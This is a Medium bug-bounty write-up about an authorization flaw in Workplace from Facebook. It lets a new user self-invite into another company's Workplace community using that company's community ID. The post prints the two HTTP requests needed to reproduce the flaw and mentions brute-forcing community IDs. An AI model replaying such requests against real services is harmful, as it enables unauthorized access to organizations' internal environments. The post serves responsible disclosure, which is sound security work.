Workplace from Facebook | Unauthorized access to companies environment

Description:

Details:

  • After registering a new account in my Workplace and revising Burp Suite history tab, I came across the following request:

Reproduction Steps:

  1. Requesting Activation Code:
POST /at_work/accounts_send_notification HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
pre_login_flow_type=SIGNUP
access_token=*****
POST /at_work/accounts_self_invite HTTP/1.1
Host: graph.workplace.com
identifier=test@gmail.com
nonce=998236
community_id=86381-----------
form_data={"name":"Test","password":"Test1234@"}
access_token=*****
  • nonce : activation code from first step.
  • community_id : Target company’s community ID.
  • The attacker had to have the ID from the target company’s community. This was possible to get through brute force, or with some ex-employee from the company.
  • Some days after I received the bounty, I was able to find an endpoint which gives the community_id from any company in Workplace.

Timeline:

--

--

--

Brazilian 19 years old

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Marcos Ferreira

Marcos Ferreira

Brazilian 19 years old

More from Medium

Making Sense Of The Dirty Pipe Vulnerability (CVE-2022–0847) — RedHunt Labs

Runner Up at BPJS Kesehatan Security Hackathon

Walkthrough : hackyourselffirst.troyhunt.com

DVWA BLIND Sqli